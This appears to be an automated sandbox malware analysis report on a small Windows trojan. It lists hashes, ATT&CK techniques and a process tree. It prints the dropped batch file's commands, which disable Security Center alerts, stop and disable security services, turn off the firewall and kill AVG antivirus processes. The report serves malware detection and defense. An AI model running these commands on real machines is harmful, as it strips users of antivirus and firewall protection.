42a03a01291ad18b2f57364b99fedf6ecbdf97ef25416f64556757a3fc2760f2

Analysis

max time kernel
92s
max time network
93s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
12-07-2024 14:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3dadd87327e92b402f5d02952eb256cf_JaffaCakes118.exe
Size

36KB
MD5

3dadd87327e92b402f5d02952eb256cf
SHA1

4dfc944c3cd1e1e7756b0975ce1212687848412b
SHA256

42a03a01291ad18b2f57364b99fedf6ecbdf97ef25416f64556757a3fc2760f2
SHA512

8451110acfb23cd19709a544e79e7e6d1b2207a7825cdd9d7067af01f5dd02a900275accdfe7f85daffa3bd2962a96d09b466b48d4f6acb8dc6fb969238d173f
SSDEEP

768:82gpFmvbXimSBlWRVJqYOF6dXm3jI3bOmcO:+KiYAF65m3jMcO

Score

10^/10

evasion execution persistence privilege_escalation trojan

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002

Windows security bypass 2 TTPs 3 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	reg.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4816	netsh.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation	3dadd87327e92b402f5d02952eb256cf_JaffaCakes118.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3464	sc.exe
264	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Kills process with taskkill 24 IoCs

evasion

pid	Process
1592	taskkill.exe
2768	taskkill.exe
1900	taskkill.exe
3500	taskkill.exe
2804	taskkill.exe
5028	taskkill.exe
4848	taskkill.exe
3988	taskkill.exe
2772	taskkill.exe
2912	taskkill.exe
2812	taskkill.exe
2932	taskkill.exe
1696	taskkill.exe
2796	taskkill.exe
3452	taskkill.exe
1288	taskkill.exe
1752	taskkill.exe
1380	taskkill.exe
2552	taskkill.exe
2888	taskkill.exe
4480	taskkill.exe
4288	taskkill.exe
904	taskkill.exe
820	taskkill.exe

Runs net.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

description	pid	Process
Token: SeDebugPrivilege	1900	taskkill.exe
Token: SeDebugPrivilege	3500	taskkill.exe
Token: SeDebugPrivilege	4288	taskkill.exe
Token: SeDebugPrivilege	2912	taskkill.exe
Token: SeDebugPrivilege	904	taskkill.exe
Token: SeDebugPrivilege	2804	taskkill.exe
Token: SeDebugPrivilege	5028	taskkill.exe
Token: SeDebugPrivilege	4848	taskkill.exe
Token: SeDebugPrivilege	2812	taskkill.exe
Token: SeDebugPrivilege	1288	taskkill.exe
Token: SeDebugPrivilege	1752	taskkill.exe
Token: SeDebugPrivilege	1380	taskkill.exe
Token: SeDebugPrivilege	3988	taskkill.exe
Token: SeDebugPrivilege	2932	taskkill.exe
Token: SeDebugPrivilege	2552	taskkill.exe
Token: SeDebugPrivilege	2888	taskkill.exe
Token: SeDebugPrivilege	1592	taskkill.exe
Token: SeDebugPrivilege	820	taskkill.exe
Token: SeDebugPrivilege	2768	taskkill.exe
Token: SeDebugPrivilege	1696	taskkill.exe
Token: SeDebugPrivilege	4480	taskkill.exe
Token: SeDebugPrivilege	2796	taskkill.exe
Token: SeDebugPrivilege	2772	taskkill.exe
Token: SeDebugPrivilege	3452	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1596 wrote to memory of 4828	1596	3dadd87327e92b402f5d02952eb256cf_JaffaCakes118.exe	85
PID 1596 wrote to memory of 4828	1596	3dadd87327e92b402f5d02952eb256cf_JaffaCakes118.exe	85
PID 1596 wrote to memory of 4828	1596	3dadd87327e92b402f5d02952eb256cf_JaffaCakes118.exe	85
PID 4828 wrote to memory of 2616	4828	cmd.exe	88
PID 4828 wrote to memory of 2616	4828	cmd.exe	88
PID 4828 wrote to memory of 2616	4828	cmd.exe	88
PID 4828 wrote to memory of 2392	4828	cmd.exe	90
PID 4828 wrote to memory of 2392	4828	cmd.exe	90
PID 4828 wrote to memory of 2392	4828	cmd.exe	90
PID 4828 wrote to memory of 376	4828	cmd.exe	91
PID 4828 wrote to memory of 376	4828	cmd.exe	91
PID 4828 wrote to memory of 376	4828	cmd.exe	91
PID 4828 wrote to memory of 3488	4828	cmd.exe	92
PID 4828 wrote to memory of 3488	4828	cmd.exe	92
PID 4828 wrote to memory of 3488	4828	cmd.exe	92
PID 3488 wrote to memory of 2452	3488	net.exe	93
PID 3488 wrote to memory of 2452	3488	net.exe	93
PID 3488 wrote to memory of 2452	3488	net.exe	93
PID 4828 wrote to memory of 2072	4828	cmd.exe	94
PID 4828 wrote to memory of 2072	4828	cmd.exe	94
PID 4828 wrote to memory of 2072	4828	cmd.exe	94
PID 2072 wrote to memory of 1964	2072	net.exe	95
PID 2072 wrote to memory of 1964	2072	net.exe	95
PID 2072 wrote to memory of 1964	2072	net.exe	95
PID 4828 wrote to memory of 264	4828	cmd.exe	96
PID 4828 wrote to memory of 264	4828	cmd.exe	96
PID 4828 wrote to memory of 264	4828	cmd.exe	96
PID 4828 wrote to memory of 4816	4828	cmd.exe	97
PID 4828 wrote to memory of 4816	4828	cmd.exe	97
PID 4828 wrote to memory of 4816	4828	cmd.exe	97
PID 4828 wrote to memory of 3464	4828	cmd.exe	98
PID 4828 wrote to memory of 3464	4828	cmd.exe	98
PID 4828 wrote to memory of 3464	4828	cmd.exe	98
PID 4828 wrote to memory of 1900	4828	cmd.exe	99
PID 4828 wrote to memory of 1900	4828	cmd.exe	99
PID 4828 wrote to memory of 1900	4828	cmd.exe	99
PID 4828 wrote to memory of 3500	4828	cmd.exe	101
PID 4828 wrote to memory of 3500	4828	cmd.exe	101
PID 4828 wrote to memory of 3500	4828	cmd.exe	101
PID 4828 wrote to memory of 4288	4828	cmd.exe	102
PID 4828 wrote to memory of 4288	4828	cmd.exe	102
PID 4828 wrote to memory of 4288	4828	cmd.exe	102
PID 4828 wrote to memory of 2912	4828	cmd.exe	103
PID 4828 wrote to memory of 2912	4828	cmd.exe	103
PID 4828 wrote to memory of 2912	4828	cmd.exe	103
PID 4828 wrote to memory of 904	4828	cmd.exe	104
PID 4828 wrote to memory of 904	4828	cmd.exe	104
PID 4828 wrote to memory of 904	4828	cmd.exe	104
PID 4828 wrote to memory of 2804	4828	cmd.exe	105
PID 4828 wrote to memory of 2804	4828	cmd.exe	105
PID 4828 wrote to memory of 2804	4828	cmd.exe	105
PID 4828 wrote to memory of 5028	4828	cmd.exe	106
PID 4828 wrote to memory of 5028	4828	cmd.exe	106
PID 4828 wrote to memory of 5028	4828	cmd.exe	106
PID 4828 wrote to memory of 4848	4828	cmd.exe	107
PID 4828 wrote to memory of 4848	4828	cmd.exe	107
PID 4828 wrote to memory of 4848	4828	cmd.exe	107
PID 4828 wrote to memory of 2812	4828	cmd.exe	108
PID 4828 wrote to memory of 2812	4828	cmd.exe	108
PID 4828 wrote to memory of 2812	4828	cmd.exe	108
PID 4828 wrote to memory of 1288	4828	cmd.exe	109
PID 4828 wrote to memory of 1288	4828	cmd.exe	109
PID 4828 wrote to memory of 1288	4828	cmd.exe	109
PID 4828 wrote to memory of 1752	4828	cmd.exe	110

C:\Users\Admin\AppData\Local\Temp\3dadd87327e92b402f5d02952eb256cf_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\3dadd87327e92b402f5d02952eb256cf_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1596
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9635.tmp\DESATIVAR ANTIVIRUS GERAL.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4828
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\software\microsoft\security center" /f /v AntiVirusDisableNotify /t REG_DWORD /d 1
    3⤵
    - Windows security bypass
    PID:2616
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\software\microsoft\security center" /f /v FirewallDisableNotify /t REG_DWORD /d 1
    3⤵
    - Windows security bypass
    PID:2392
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\software\microsoft\security center" /f /v UpdatesDisableNotify /t REG_DWORD /d 1
    3⤵
    - Windows security bypass
    PID:376
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3488
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      PID:2452
- - C:\Windows\SysWOW64\net.exe
    net stop wscsvc
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2072
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wscsvc
      4⤵
      PID:1964
- - C:\Windows\SysWOW64\sc.exe
    sc config wscsvc start= disabled
    3⤵
    - Launches sc.exe
    PID:264
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4816
- - C:\Windows\SysWOW64\sc.exe
    sc config antivirservice start= disabled
    3⤵
    - Launches sc.exe
    PID:3464
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im avgcsrvx.exe /t
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1900
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im avgemc.exe /t
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3500
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im avgrsx.exe /t
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4288
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im avgchsvx.exe /t
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2912
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im avgnsx.exe /t
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:904
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im avgwdsvc.exe /t
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2804
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im avgcsrvx.exe /t
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5028
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im avgemc.exe /t
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4848
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im avgrsx.exe /t
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2812
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im avgchsvx.exe /t
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1288
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im avgnsx.exe /t
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1752
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im avgwdsvc.exe /t
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1380
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im avgcsrvx.exe /t
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3988
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im avgemc.exe /t
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2932
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im avgrsx.exe /t
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2552
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im avgchsvx.exe /t
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2888
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im avgnsx.exe /t
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1592
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im avgwdsvc.exe /t
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:820
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im avgcsrvx.exe /t
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2768
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im avgemc.exe /t
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1696
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im avgrsx.exe /t
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4480
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im avgchsvx.exe /t
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2796
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im avgnsx.exe /t
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2772
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im avgwdsvc.exe /t
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3452

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\9635.tmp\DESATIVAR ANTIVIRUS GERAL.bat

Filesize
1KB

MD5
5d8d11c356ba744b6954b9a5cb3a4618

SHA1
1eb904f7401929fcbdc7efbd9e33a674a7ccb17f

SHA256
7ca23f66dcef0342d305d6c186614739312df87f27c26233b11aac54406fbd21

SHA512
d8aa07044290308db09ca0c6bfa9d885f9ac16d3a6558a0cff84be609364833486f40a9ea25a2df347fa2d0c4ba4267a9e5fc37f733654314a212925675a5c58

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads